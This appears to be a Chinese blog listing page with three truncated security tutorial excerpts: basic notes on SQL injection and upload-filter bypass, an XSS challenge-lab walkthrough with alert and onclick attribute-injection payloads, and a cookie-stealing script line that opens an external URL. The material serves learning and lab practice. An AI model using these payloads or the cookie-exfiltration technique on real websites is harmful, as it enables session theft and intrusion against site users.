摘要:
基本概念: SQL注入:在与数据库交互的地方,加入SQL语句来获得数据库信息,绕过某些登录,执行系统命令等的操作 例如:利用万能密码登录后台,添加用户,执行系统命令,获取密码等 上传:对用户上传文件类型判断失误,导致上传攻击者的脚本文件,从而对网站进行攻击 上传需要绕过:1.客户端js脚本检测:刚选 阅读全文
摘要:
地址:http://118.89.29.193:8080/level1.php (总共20关) 1.当<script>alert(1)</script>被拦截时,如果在value值内的话,尝试value="" onclick='javascript:alert(1)'> (注意:需要触发才可以执行j 阅读全文
摘要:
1.不同的浏览器对js脚本的过滤措施不同,IE可以执行的,搜狗和Chrome提示Token contains reflects xss啥的 搜狗浏览器: IE: 2.获取cookie ...............class=<script>window.open("http://www.cnblo 阅读全文